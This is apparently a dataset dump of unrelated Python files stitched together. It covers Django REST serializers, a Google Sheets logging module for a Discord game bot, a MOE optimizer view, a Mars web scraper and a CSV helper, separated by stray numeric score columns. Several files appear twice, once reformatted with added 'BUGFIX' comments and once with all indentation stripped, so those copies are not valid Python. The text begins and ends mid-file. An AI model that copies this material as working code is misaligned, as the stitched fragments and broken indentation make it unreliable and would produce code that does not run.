questionsets = QuestionSetSerializer(many=True, read_only=True)
class Meta:
model = OptionSet
fields = (
'id',
'uri_prefix',
'key',
'comment',
'order',
'provider_key',
'conditions',
'questionsets'
)
validators = (OptionSetUniqueKeyValidator(), )
class OptionSerializer(TranslationSerializerMixin, serializers.ModelSerializer):
optionset = serializers.PrimaryKeyRelatedField(queryset=OptionSet.objects.all(), required=True)
conditions = ConditionSerializer(many=True, read_only=True)
class Meta:
model = Option
fields = (
'id',
'optionset',
'uri_prefix',
'key',
'comment',
'order',
'text',
'label',
'additional_input',
'conditions'
)
trans_fields = (
'text',
)
validators = (OptionUniquePathValidator(), )
class OptionSetIndexSerializer(serializers.ModelSerializer):
class Meta:
model = OptionSet
fields = (
'id',
'key',
)
class OptionIndexSerializer(serializers.ModelSerializer):
class Meta:
model = Option
fields = (
'id',
'optionset',
'key',
'text'
)
class ProviderNestedSerializer(serializers.Serializer):
key = serializers.CharField()
label = serializers.CharField()
class_name = serializers.CharField()
class Meta:
fields = (
'key',
'label',
'class_name'
)
class OptionNestedSerializer(serializers.ModelSerializer):
warning = serializers.SerializerMethodField()
xml_url = serializers.SerializerMethodField()
class Meta:
model = Option
fields = (
'id',
'uri_prefix',
'path',
'text',
'warning',
'xml_url'
)
def get_warning(self, obj):
return get_language_warning(obj, 'text')
def get_xml_url(self, obj):
return reverse('v1-options:option-detail-export', args=[obj.pk])
class OptionSetNestedSerializer(serializers.ModelSerializer):
options = OptionNestedSerializer(many=True)
provider = ProviderNestedSerializer()
xml_url = serializers.SerializerMethodField()
class Meta:
model = OptionSet
fields = (
'id',
'uri_prefix',
'key',
'provider',
'options',
'xml_url'
)
def get_xml_url(self, obj):
return reverse('v1-options:optionset-detail-export', args=[obj.pk]) | 0.694303 | 0.116966 |
from pickle import load, dump
from os.path import exists, dirname, join
from threading import Thread, RLock
from datetime import datetime
from utils.log import FileLogger
from utils.timer import get_settlement_time_object
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
_scopes = ['https://www.googleapis.com/auth/spreadsheets']
_creds_path = join(dirname(__file__), 'credentials.json')
_pickle_path = join(dirname(__file__), 'token.pickle')
_sheet_id_path = join(dirname(__file__), 'sheet.id')
_creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if exists(_pickle_path):
with open(_pickle_path, 'rb') as token:
_creds = load(token)
# If there are no (valid) credentials available, let the user log in.
if not _creds or not _creds.valid:
if _creds and _creds.expired and _creds.refresh_token:
_creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(_creds_path, _scopes)
_creds = flow.run_console()
# Save the credentials for the next run
with open(_pickle_path, 'wb') as token:
dump(_creds, token)
_service = build('sheets', 'v4', credentials=_creds)
_spreadsheet_id = ''
_start_date = datetime.now()
_player_list = {}
_undo = {}
_undo['undostack'] = []
_undo['redostack'] = []
_sheet_lock = RLock()
def get_sheets_id():
    """Return the ID of the currently active spreadsheet."""
    # reading a module global needs no `global` declaration
    return _spreadsheet_id
def read_sheet(range_name):
    """Read `range_name` from the active spreadsheet.

    Returns the list of row value-lists ([] for an empty range), or
    None on API failure (the error is logged, not raised).
    """
    try:
        sheets = _service.spreadsheets()
        result = sheets.values().get(spreadsheetId=_spreadsheet_id, range=range_name).execute()
    except Exception as e:
        FileLogger.error(f'Fail to read sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
        return
    return result.get('values', [])
def write_sheet(range_name, body, option='RAW'):
    """Overwrite `range_name` with `body` ({'values': [[...], ...]}).

    option is the Sheets valueInputOption ('RAW' or 'USER_ENTERED').
    Returns the API result dict, or None on failure (logged, not raised).
    """
    try:
        sheets = _service.spreadsheets()
        result = sheets.values().update(spreadsheetId=_spreadsheet_id, range=range_name, body=body, valueInputOption=option).execute()
    except Exception as e:
        FileLogger.error(f'Fail to write sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
        return
    return result
def append_sheet(range_name, body, option='RAW'):
    """Append `body` rows after the table found at `range_name`.

    option is the Sheets valueInputOption ('RAW' or 'USER_ENTERED').
    Returns the API result dict (its 'updates' key reports the appended
    range), or None on failure (logged, not raised).
    """
    try:
        sheets = _service.spreadsheets()
        result = sheets.values().append(spreadsheetId=_spreadsheet_id, range=range_name, body=body, valueInputOption=option).execute()
    except Exception as e:
        FileLogger.error(f'Fail to append sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
        return
    return result
def get_start_date():
    """Read the event start date from cell A1 of the roster sheet.

    Caches the parsed, timezone-aware datetime in module global
    _start_date. Returns None (and logs) when the cell is unreadable.
    """
    global _start_date
    values = read_sheet('隊員列表!A1:A1')
    if not values:
        FileLogger.error('No start date found.')
        return None
    else:
        # cell format: YYYY/MM/DD
        date_tokens = values[0][0].split('/')
        settlement_time = get_settlement_time_object()
        # attach the settlement timezone so later arithmetic against
        # tz-aware datetimes (e.g. in fill_sheet) is valid
        _start_date = datetime(year=int(date_tokens[0]), month=int(date_tokens[1]), day=int(date_tokens[2])).replace(tzinfo=settlement_time.tzinfo)
        return _start_date
def get_player_list():
    """Reload the discord-id -> nickname mapping from the roster sheet.

    Returns the mapping, or None when the range is empty/unreadable.
    """
    global _player_list
    rows = read_sheet('隊員列表!B2:C')
    if not rows:
        FileLogger.error('No player list found.')
        return None
    # column B = nickname, column C = discord id
    _player_list = {int(row[1]): row[0] for row in rows}
    return _player_list
def switch_sheets(sheet_id):
    """Switch the active spreadsheet, refresh the cached start date and
    player list, and persist the ID to sheet.id for the next startup.

    Returns (sheet_id, start_date, player_list).
    """
    global _spreadsheet_id
    _spreadsheet_id = sheet_id
    start_date = get_start_date()
    player_list = get_player_list()
    with open(_sheet_id_path, 'w') as f:
        f.write(_spreadsheet_id)
    return _spreadsheet_id, start_date, player_list
def fill_sheet(player_discord_id, description, play_number, boss_tag, damage, play_option, play_miss):
    """Append one battle-log row for a player to today's log sheet.

    :param player_discord_id: Discord id used to look up the player's nickname.
    :param description: human-readable description stored on the undo stack.
    :param play_number: attempt number for the day.
    :param boss_tag: identifier of the attacked boss.
    :param damage: damage dealt.
    :param play_option: '補' marks a carry-over ('B') attempt, else 'A'.
    :param play_miss: > 0 marks the attempt with the '閃' (whiff) tag.
    :return: True when the row was appended and recorded for undo, else False.
    """
    global _undo
    if player_discord_id not in _player_list:
        FileLogger.warn(f'Discord ID: {player_discord_id} not found in sheet')
        return False
    player_nickname = _player_list[player_discord_id]
    today = get_settlement_time_object()
    play_tag = f"{play_number}{'B' if play_option == '補' else 'A'}"
    missing_tag = '閃' if play_miss > 0 else ''
    body = {
        'values': [
            [
                today.strftime("%Y/%m/%d %H:%M:%S"), player_nickname, play_tag, damage, boss_tag, missing_tag
            ]
        ]
    }
    # Log sheets are named per challenge day, counted from _start_date.
    play_day_offset = today - _start_date
    range_name = f'Day {play_day_offset.days + 1}-Log!A2:F'
    # BUGFIX: use the lock as a context manager so it is released even if
    # append_sheet raises; the old acquire()/release() pair leaked the lock
    # on any exception, deadlocking every later sheet write.
    with _sheet_lock:
        result = append_sheet(range_name, body)
    try:
        # result is None when append_sheet failed; the attribute access then
        # raises AttributeError, which is logged below.
        updated_range = result.get('updates').get('updatedRange')
        _undo['undostack'].append([updated_range, body, description])
        # A new write invalidates anything previously available for redo.
        _undo['redostack'] = []
        return True
    except Exception as e:
        FileLogger.error(f'Fail to get result: {description}\n'+ str(e))
        return False
def undo():
    """Blank the most recently written row and move it to the redo stack.

    :return: the description of the undone operation, or None on failure.
    :raises IndexError: when the undo stack is empty (same as before).
    """
    global _undo
    range_name, body, description = _undo['undostack'].pop()
    empty_body = {
        'values': [
            [
                '', '', '', '', '', ''
            ]
        ]
    }
    # Context manager guarantees the lock is released on any code path.
    with _sheet_lock:
        result = write_sheet(range_name, empty_body)
    # BUGFIX: initialize before the try block.  write_sheet returns None on
    # failure, result.get then raises AttributeError, and the original code
    # hit a NameError on the unbound 'updated_range' below.
    updated_range = None
    try:
        updated_range = result.get('updatedRange')
    except Exception as e:
        FileLogger.error(f'Fail to get undo result: {description}\n'+ str(e))
    if updated_range and range_name == updated_range:
        _undo['redostack'].append([updated_range, body, description])
        return description
    else:
        FileLogger.error(f'Inconsistent undo result: {description}')
        return None
def redo():
    """Re-apply the most recently undone row write.

    :return: the description of the redone operation, or None on failure.
    :raises IndexError: when the redo stack is empty (same as before).
    """
    global _undo
    range_name, body, description = _undo['redostack'].pop()
    # Context manager guarantees the lock is released on any code path.
    with _sheet_lock:
        result = write_sheet(range_name, body)
    # BUGFIX: initialize before the try block.  write_sheet returns None on
    # failure, result.get then raises AttributeError, and the original code
    # hit a NameError on the unbound 'updated_range' below.
    updated_range = None
    try:
        updated_range = result.get('updatedRange')
    except Exception as e:
        FileLogger.error(f'Fail to get redo result: {description}\n'+ str(e))
    if updated_range and range_name == updated_range:
        _undo['undostack'].append([updated_range, body, description])
        return description
    else:
        FileLogger.error(f'Inconsistent redo result: {description}')
        return None
# The file sheet.id stores the id of a specific google sheet, and is
# created automatically when the switching happens.
if exists(_sheet_id_path):
    # Restore the last-used spreadsheet on import; switch_sheets also
    # reloads the start date and player list from that sheet.
    with open(_sheet_id_path, 'r') as f:
        switch_sheets(f.read())
from os.path import exists, dirname, join
from threading import Thread, RLock
from datetime import datetime
from utils.log import FileLogger
from utils.timer import get_settlement_time_object
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
_scopes = ['https://www.googleapis.com/auth/spreadsheets']
_creds_path = join(dirname(__file__), 'credentials.json')
_pickle_path = join(dirname(__file__), 'token.pickle')
_sheet_id_path = join(dirname(__file__), 'sheet.id')
_creds = None
# The file token.pickle stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if exists(_pickle_path):
with open(_pickle_path, 'rb') as token:
_creds = load(token)
# If there are no (valid) credentials available, let the user log in.
if not _creds or not _creds.valid:
if _creds and _creds.expired and _creds.refresh_token:
_creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(_creds_path, _scopes)
_creds = flow.run_console()
# Save the credentials for the next run
with open(_pickle_path, 'wb') as token:
dump(_creds, token)
_service = build('sheets', 'v4', credentials=_creds)
_spreadsheet_id = ''
_start_date = datetime.now()
_player_list = {}
_undo = {}
_undo['undostack'] = []
_undo['redostack'] = []
_sheet_lock = RLock()
def get_sheets_id():
global _spreadsheet_id
return _spreadsheet_id
def read_sheet(range_name):
try:
sheets = _service.spreadsheets()
result = sheets.values().get(spreadsheetId=_spreadsheet_id, range=range_name).execute()
except Exception as e:
FileLogger.error(f'Fail to read sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
return
return result.get('values', [])
def write_sheet(range_name, body, option='RAW'):
try:
sheets = _service.spreadsheets()
result = sheets.values().update(spreadsheetId=_spreadsheet_id, range=range_name, body=body, valueInputOption=option).execute()
except Exception as e:
FileLogger.error(f'Fail to write sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
return
return result
def append_sheet(range_name, body, option='RAW'):
try:
sheets = _service.spreadsheets()
result = sheets.values().append(spreadsheetId=_spreadsheet_id, range=range_name, body=body, valueInputOption=option).execute()
except Exception as e:
FileLogger.error(f'Fail to append sheet: ID={_spreadsheet_id}, range={range_name}\n'+ str(e))
return
return result
def get_start_date():
global _start_date
values = read_sheet('隊員列表!A1:A1')
if not values:
FileLogger.error('No start date found.')
return None
else:
date_tokens = values[0][0].split('/')
settlement_time = get_settlement_time_object()
_start_date = datetime(year=int(date_tokens[0]), month=int(date_tokens[1]), day=int(date_tokens[2])).replace(tzinfo=settlement_time.tzinfo)
return _start_date
def get_player_list():
global _player_list
values = read_sheet('隊員列表!B2:C')
if not values:
FileLogger.error('No player list found.')
return None
else:
_player_list = {}
for row in values:
_player_list[int(row[1])] = row[0]
return _player_list
def switch_sheets(sheet_id):
global _spreadsheet_id
_spreadsheet_id = sheet_id
start_date = get_start_date()
player_list = get_player_list()
with open(_sheet_id_path, 'w') as f:
f.write(_spreadsheet_id)
return _spreadsheet_id, start_date, player_list
def fill_sheet(player_discord_id, description, play_number, boss_tag, damage, play_option, play_miss):
global _undo, _sheet_lock
if player_discord_id not in _player_list:
FileLogger.warn(f'Discord ID: {player_discord_id} not found in sheet')
return False
player_nickname = _player_list[player_discord_id]
today = get_settlement_time_object()
play_tag = f"{play_number}{'B' if play_option == '補' else 'A'}"
missing_tag = '閃' if play_miss > 0 else ''
body = {
'values': [
[
today.strftime("%Y/%m/%d %H:%M:%S"), player_nickname, play_tag, damage, boss_tag, missing_tag
]
]
}
play_day_offset = today - _start_date
range_name = f'Day {play_day_offset.days + 1}-Log!A2:F'
_sheet_lock.acquire()
result = append_sheet(range_name, body)
_sheet_lock.release()
checkResult = True
try:
updates = result.get('updates')
updated_range = updates.get('updatedRange')
_undo['undostack'].append([updated_range, body, description])
_undo['redostack'] = []
except Exception as e:
FileLogger.error(f'Fail to get result: {description}\n'+ str(e))
checkResult = False
return checkResult
def undo():
global _undo, _sheet_lock
op = _undo['undostack'][-1]
_undo['undostack'] = _undo['undostack'][0:-1]
(range_name, body, description) = op
empty_body = {
'values': [
[
'', '', '', '', '', ''
]
]
}
_sheet_lock.acquire()
result = write_sheet(range_name, empty_body)
_sheet_lock.release()
try:
updated_range = result.get('updatedRange')
except Exception as e:
FileLogger.error(f'Fail to get undo result: {description}\n'+ str(e))
if updated_range and range_name == updated_range:
_undo['redostack'].append([updated_range, body, description])
return description
else:
FileLogger.error(f'Inconsistent undo result: {description}')
return None
def redo():
global _undo, _sheet_lock
op = _undo['redostack'][-1]
_undo['redostack'] = _undo['redostack'][0:-1]
(range_name, body, description) = op
_sheet_lock.acquire()
result = write_sheet(range_name, body)
_sheet_lock.release()
try:
updated_range = result.get('updatedRange')
except Exception as e:
FileLogger.error(f'Fail to get redo result: {description}\n'+ str(e))
if updated_range and range_name == updated_range:
_undo['undostack'].append([updated_range, body, description])
return description
else:
FileLogger.error(f'Inconsistent redo result: {description}')
return None
# The file sheet.id stores the id of a specific google sheet, and is
# created automatically when the switching happens.
if exists(_sheet_id_path):
with open(_sheet_id_path, 'r') as f:
switch_sheets(f.read()) | 0.252568 | 0.089415 |
"""A superclass to encapsulate getting optimizer parameters for views."""
import copy
from moe.optimal_learning.python.constant import OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS, ENDPOINT_TO_DEFAULT_OPTIMIZER_TYPE
from moe.views.gp_pretty_view import GpPrettyView
from moe.views.schemas.base_schemas import OptimizerInfo, OPTIMIZER_TYPES_TO_SCHEMA_CLASSES
class OptimizableGpPrettyView(GpPrettyView):
    """A superclass to encapsulate getting optimizer parameters for views."""

    def _get_default_optimizer_type(self, params):
        """Get the optimizer type associated with this REST endpoint.

        :param params: a (partially) deserialized REST request with everything
            except possibly ``params['optimizer_info']``
        :type params: dict
        :return: optimizer type to use, one of
            :const:`moe.optimal_learning.python.constant.OPTIMIZER_TYPES`
        :rtype: str

        """
        return ENDPOINT_TO_DEFAULT_OPTIMIZER_TYPE[self._route_name]

    def _get_default_optimizer_params(self, params):
        """Get the default optimizer parameters for the desired ``optimizer_type`` and REST endpoint.

        :param params: a (partially) deserialized REST request with everything
            except possibly ``params['optimizer_info']``
        :type params: dict
        :return: default multistart and optimizer parameters to use with this REST request
        :rtype: :class:`moe.optimal_learning.python.constant.DefaultOptimizerInfoTuple`

        """
        optimizer_type = params['optimizer_info']['optimizer_type']
        optimizer_parameters_lookup = (optimizer_type, self._route_name)
        return OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS[optimizer_parameters_lookup]

    def get_params_from_request(self):
        """Return the deserialized parameters from the json_body of a request.

        We explicitly pull out the ``optimizer_type`` and use it to deserialize and validate
        the other parameters (num_multistarts, num_random_samples, optimizer_parameters).

        This is necessary because we have different default optimizer parameters for
        different combinations of ``optimizer_type``, endpoint, and other features.

        See :const:`moe.optimal_learning.python.constants.OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS`

        :returns: A deserialized self.request_schema object
        :rtype: dict

        """
        # First we get the standard params (not including optimizer info)
        params = super(OptimizableGpPrettyView, self).get_params_from_request()

        # colander deserialized results are READ-ONLY. We will potentially be overwriting
        # fields of ``params['optimizer_info']``, so we need to copy it first.
        params['optimizer_info'] = copy.deepcopy(params['optimizer_info'])

        # Set optimizer_type to default value if the user did not provide a value
        if params['optimizer_info']['optimizer_type'] is None:
            params['optimizer_info']['optimizer_type'] = self._get_default_optimizer_type(params)

        default_optimizer_parameters = self._get_default_optimizer_params(params)

        # Set num_multistarts to default value if the user did not provide a value
        if params['optimizer_info']['num_multistarts'] is None:
            params['optimizer_info']['num_multistarts'] = default_optimizer_parameters.num_multistarts

        # Set num_random_samples to default value if the user did not provide a value
        if params['optimizer_info']['num_random_samples'] is None:
            params['optimizer_info']['num_random_samples'] = default_optimizer_parameters.num_random_samples

        # Override the defaults with information that may be in the optimizer parameters
        optimizer_parameters_dict = default_optimizer_parameters.optimizer_parameters._asdict()
        if params['optimizer_info']['optimizer_parameters']:
            # BUGFIX: .items() replaces the Python-2-only dict.iteritems();
            # it is equivalent on Python 2 and required on Python 3.
            for param, val in params['optimizer_info']['optimizer_parameters'].items():
                optimizer_parameters_dict[param] = val

        # Find the schema class that corresponds to the ``optimizer_type`` of the request
        # TODO(GH-303): Until this ticket is complete (see schemas.OptimizerInfo),
        # optimizer_parameters has *not been validated yet*, so we need to validate manually.
        schema_class = OPTIMIZER_TYPES_TO_SCHEMA_CLASSES[params['optimizer_info']['optimizer_type']]()

        # Deserialize and validate the parameters
        validated_optimizer_parameters = schema_class.deserialize(optimizer_parameters_dict)

        # Put the now validated parameters back into the params dictionary to be consumed by the view
        params['optimizer_info']['optimizer_parameters'] = validated_optimizer_parameters

        # We may have filled in missing values; re-validate these values with deserialize()
        # and write the result into optimizer_info.
        params['optimizer_info'] = OptimizerInfo().deserialize(params['optimizer_info'])
        return params
import copy
from moe.optimal_learning.python.constant import OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS, ENDPOINT_TO_DEFAULT_OPTIMIZER_TYPE
from moe.views.gp_pretty_view import GpPrettyView
from moe.views.schemas.base_schemas import OptimizerInfo, OPTIMIZER_TYPES_TO_SCHEMA_CLASSES
class OptimizableGpPrettyView(GpPrettyView):
"""A superclass to encapsulate getting optimizer parameters for views."""
def _get_default_optimizer_type(self, params):
"""Get the optimizer type associated with this REST endpoint.
:param params: a (partially) deserialized REST request with everything except possibly
``params['optimizer_info']``
:type params: dict
:return: optimizer type to use, one of :const:`moe.optimal_learning.python.constant.OPTIMIZER_TYPES`
:rtype: str
"""
return ENDPOINT_TO_DEFAULT_OPTIMIZER_TYPE[self._route_name]
def _get_default_optimizer_params(self, params):
"""Get the default optimizer parameters associated with the desired ``optimizer_type`` and REST endpoint.
:param params: a (partially) deserialized REST request with everything except possibly
``params['optimizer_info']``
:type params: dict
:return: default multistart and optimizer parameters to use with this REST request
:rtype: :class:`moe.optimal_learning.python.constant.DefaultOptimizerInfoTuple`
"""
optimizer_type = params['optimizer_info']['optimizer_type']
optimizer_parameters_lookup = (optimizer_type, self._route_name)
return OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS[optimizer_parameters_lookup]
def get_params_from_request(self):
"""Return the deserialized parameters from the json_body of a request.
We explicitly pull out the ``optimizer_type`` and use it to deserialize and validate
the other parameters (num_multistarts, num_random_samples, optimizer_parameters).
This is necessary because we have different default optimizer parameters for
different combinations of ``optimizer_type``, endpoint, and other features.
See :const:`moe.optimal_learning.python.constants.OPTIMIZER_TYPE_AND_OBJECTIVE_TO_DEFAULT_PARAMETERS`
:returns: A deserialized self.request_schema object
:rtype: dict
"""
# First we get the standard params (not including optimizer info)
params = super(OptimizableGpPrettyView, self).get_params_from_request()
# colander deserialized results are READ-ONLY. We will potentially be overwriting
# fields of ``params['optimizer_info']``, so we need to copy it first.
params['optimizer_info'] = copy.deepcopy(params['optimizer_info'])
# Set optimizer_type to default value if the user did not provide a value
if params['optimizer_info']['optimizer_type'] is None:
params['optimizer_info']['optimizer_type'] = self._get_default_optimizer_type(params)
default_optimizer_parameters = self._get_default_optimizer_params(params)
# Set num_multistarts to default value if the user did not provide a value
if params['optimizer_info']['num_multistarts'] is None:
params['optimizer_info']['num_multistarts'] = default_optimizer_parameters.num_multistarts
# Set num_random_samples to default value if the user did not provide a value
if params['optimizer_info']['num_random_samples'] is None:
params['optimizer_info']['num_random_samples'] = default_optimizer_parameters.num_random_samples
# Override the defaults with information that may be in the optimizer parameters
optimizer_parameters_dict = default_optimizer_parameters.optimizer_parameters._asdict()
if params['optimizer_info']['optimizer_parameters']:
for param, val in params['optimizer_info']['optimizer_parameters'].iteritems():
optimizer_parameters_dict[param] = val
# Find the schema class that corresponds to the ``optimizer_type`` of the request
# TODO(GH-303): Until this ticket is complete (see schemas.OptimizerInfo),
# optimizer_parameters has *not been validated yet*, so we need to validate manually.
schema_class = OPTIMIZER_TYPES_TO_SCHEMA_CLASSES[params['optimizer_info']['optimizer_type']]()
# Deserialize and validate the parameters
validated_optimizer_parameters = schema_class.deserialize(optimizer_parameters_dict)
# Put the now validated parameters back into the params dictionary to be consumed by the view
params['optimizer_info']['optimizer_parameters'] = validated_optimizer_parameters
# We may have filled in missing values; re-validate these values with deserialize()
# and write the result into optimizer_info.
params['optimizer_info'] = OptimizerInfo().deserialize(params['optimizer_info'])
return params | 0.858556 | 0.392162 |
import pandas as pd
from splinter import Browser
from bs4 import BeautifulSoup
import os
import pymongo
from flask_pymongo import PyMongo
def init_browser():
    """Create a visible (non-headless) Chrome browser driven by chromedriver."""
    return Browser("chrome", headless=False, **{"executable_path": "chromedriver"})
def scrape():
    """Scrape Mars news, featured image, weather, facts and hemisphere links.

    :return: dict with keys Updated_title, Updated_news, Featured_image,
        Weather_update, Facts_Mars and the four *_hemisphere sample URLs.

    BUGFIX: the original opened five Browser instances and quit only the
    last one, leaking four chromedriver processes per call (and all five on
    any exception).  A single browser is now reused and always closed.
    """
    browser = Browser('chrome', headless=False)
    try:
        # --- Latest NASA news: headline and teaser paragraph.
        browser.visit('https://mars.nasa.gov/news/')
        nasa_soup = BeautifulSoup(browser.html, 'html.parser')
        title_news = nasa_soup.find('div', class_='content_title').text
        parag_news = nasa_soup.find('div', class_='article_teaser_body').text

        # --- JPL featured space image (thumb src is site-relative).
        browser.visit('https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars')
        jpl_soup = BeautifulSoup(browser.html, 'html.parser')
        featured_image_url = "https://www.jpl.nasa.gov" + jpl_soup.find("img", class_="thumb")["src"]

        # --- Current Mars weather from the @marswxreport tweet.
        browser.visit('https://twitter.com/marswxreport?lang=en')
        weather_soup = BeautifulSoup(browser.html, 'html.parser')
        mars_tweet = weather_soup.find(class_='tweet-text').text

        # --- Mars planet-profile table, rendered back to HTML.
        # pandas fetches the page itself; no browser visit needed.
        mars_facts = pd.read_html("https://space-facts.com/mars/")
        mars_profile = mars_facts[1]
        mars_profile.columns = ["Mars Planet Profile", "Features"]
        mars_profile.set_index("Mars Planet Profile", inplace=True)
        html_table = mars_profile.reset_index().to_html(index=False)

        # --- Hemisphere sample images: open each detail page from the
        # search results and grab the 'Sample' download link.
        search_url = ('https://astrogeology.usgs.gov/search/results'
                      '?q=hemisphere+enhanced&k1=target&v1=Mars')
        hemisphere_titles = (
            'Cerberus Hemisphere Enhanced',
            'Schiaparelli Hemisphere Enhanced',
            'Syrtis Major Hemisphere Enhanced',
            'Valles Marineris Hemisphere Enhanced',
        )
        hemisphere_samples = []
        for hemisphere_title in hemisphere_titles:
            browser.visit(search_url)
            browser.find_by_text(hemisphere_title).click()
            hemisphere_samples.append(browser.find_by_text('Sample')['href'])

        # NOTE(review): the 'Valler_hemisphere' key typo is kept on purpose —
        # downstream templates may already depend on this key name.
        return {
            "Updated_title": title_news,
            "Updated_news": parag_news,
            "Featured_image": featured_image_url,
            "Weather_update": mars_tweet,
            "Facts_Mars": html_table,
            "Cerberus_hemisphere": hemisphere_samples[0],
            "Schiaparelli_hemisphere": hemisphere_samples[1],
            "Syrtis_hemisphere": hemisphere_samples[2],
            "Valler_hemisphere": hemisphere_samples[3],
        }
    finally:
        browser.quit()
from splinter import Browser
from bs4 import BeautifulSoup
import os
import pymongo
from flask_pymongo import PyMongo
def init_browser():
executable_path = {"executable_path": "chromedriver"}
return Browser("chrome", **executable_path, headless=False)
def scrape():
#Creating a path to chrome driver.
browser = Browser('chrome', headless=False)
browser.visit('https://mars.nasa.gov/news/')
html = browser.html
nasa_soup = BeautifulSoup(html, 'html.parser')
# Scrape the NASA webpage and collect the latest news, title and paragraph
#text. Assign the text to variables that you can reference later.
title_news = nasa_soup.find('div', class_='content_title').text
parag_news = nasa_soup.find('div', class_='article_teaser_body').text
# JPL MARS SPACE IMAGES - FEATURED IMAGE
#Visiting url for JPL Featured Space Image
browser = Browser('chrome', headless = False)
browser.visit('https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars')
html = browser.html
soup = BeautifulSoup(html, 'html.parser')
imag=soup.find("img", class_="thumb")["src"]
featured_image_url = "https://www.jpl.nasa.gov" + imag
# MARS WEATHER
#Visiting Mars weather twitter webpage
browser = Browser('chrome', headless = False)
browser.visit('https://twitter.com/marswxreport?lang=en')
soup = BeautifulSoup(browser.html, 'html.parser')
mars_tweet = soup.find(class_='tweet-text').text
# MARS FACTS
#Visiting the Mars facts webpage
browser = Browser('chrome', headless = False)
url = "https://space-facts.com/mars/"
browser.visit(url)
mars_facts = pd.read_html(url)
mars_profile = mars_facts[1]
mars_profile.columns = ["Mars Planet Profile", "Features"]
mars_profile.set_index("Mars Planet Profile", inplace=True)
html_table = mars_profile.reset_index().to_html(index=False)
# MARS HEMISPHERES
#Visiting the Mars facts webpage
browser = Browser('chrome', headless=False)
hemis_urls = []
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
CerberusEnhn = browser.find_by_text('Cerberus Hemisphere Enhanced')
Cerb = CerberusEnhn.click()
browser.url
hemis_urls.append(browser.url)
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
SchiaparelliEnhn = browser.find_by_text('Schiaparelli Hemisphere Enhanced')
Schiap = SchiaparelliEnhn.click()
browser.url
hemis_urls.append(browser.url)
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
SyrtisEnhn = browser.find_by_text('Syrtis Major Hemisphere Enhanced')
Syrtis = SyrtisEnhn.click()
browser.url
hemis_urls.append(browser.url)
browser.visit('https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars')
VallesEnhn = browser.find_by_text('Valles Marineris Hemisphere Enhanced')
Valles = VallesEnhn.click()
browser.url
hemis_urls.append(browser.url)
#naming and listing the hemisphere images
browser.visit(hemis_urls[0])
hemisurl_1 = browser.find_by_text('Sample')['href']
browser.visit(hemis_urls[1])
hemisurl_2 = browser.find_by_text('Sample')['href']
browser.visit(hemis_urls[2])
hemisurl_3 = browser.find_by_text('Sample')['href']
browser.visit(hemis_urls[3])
hemisurl_4 = browser.find_by_text('Sample')['href']
#common dictionary including all parsed internet data
common_dictionary = {
"Updated_title": title_news,
"Updated_news": parag_news,
"Featured_image": featured_image_url,
"Weather_update": mars_tweet,
"Facts_Mars": html_table,
"Cerberus_hemisphere": hemisurl_1,
"Schiaparelli_hemisphere": hemisurl_2,
"Syrtis_hemisphere": hemisurl_3,
"Valler_hemisphere": hemisurl_4
}
hemisphere_images = [
{"Title": "Valles Marineris Hemisphere", "img_url": "hemisphere4_image_url"},
{"Title": "Cerberus Hemisphere", "img_url": "hemisphere1_image_url"},
{"Title": "Schiaparelli Hemisphere", "img_url": "hemisphere2_image_url"},
{"Title": "Syrtis Major Hemisphere", "img_url": "hemisphere3_image_url"},
]
browser.quit()
return common_dictionary | 0.287668 | 0.226591 |
# This code supports CSV (comma-separated values) text files like the csv library,
# but adds set-type operations AddRow() and DeleteRow()
# Each CSV file consists of a series of zero or more lines called rows.
# Each row is a comma-separated list of values.
# ReadToList() returns a list of row-elements, where each row-element is
# itself a list of the values in the corresponding row (line) of the file.
# AddRow() and DeleteRow() each take a row-element as their second argument.
import os, csv
# Read CSV file into a list of lists
def ReadToList(csvPath):
    """Read the CSV file at *csvPath* into a list of row lists.

    :param csvPath: path of the CSV file to read.
    :return: list of rows, each a list of string values; [] when the file
        cannot be read or parsed (a message is printed, nothing raised).
    """
    try:
        # newline='' lets the csv module do its own line-ending handling,
        # as the csv docs require.
        with open(csvPath, 'r', newline='') as csvFile:
            return list(csv.reader(csvFile))
    # Narrowed from a bare 'except:' which also swallowed KeyboardInterrupt
    # and SystemExit; only file and parse errors are expected here.
    except (OSError, csv.Error):
        print("The CSV could not be read.")
        return []
def AddRow(csvPath, rowToAdd):
    """Append *rowToAdd* to the CSV file unless an equal row already exists.

    :param csvPath: path of the CSV file (created if missing).
    :param rowToAdd: list of string values for the new row.
    :return: True when the row was appended, False when already present.
    """
    alreadyExists = False
    if os.path.exists(csvPath):
        try:
            with open(csvPath, 'r', newline='') as csvFile:
                alreadyExists = any(row == rowToAdd for row in csv.reader(csvFile))
        # Narrowed from a bare 'except:'; on read failure we keep the old
        # best-effort behavior and fall through to the append.
        except (OSError, csv.Error):
            print("The CSV could not be read.")
    if not alreadyExists:
        # BUGFIX: write through csv.writer so values containing commas or
        # quotes are escaped properly.  The old ','.join() wrote rows that
        # csv.reader could not round-trip, which broke the duplicate check
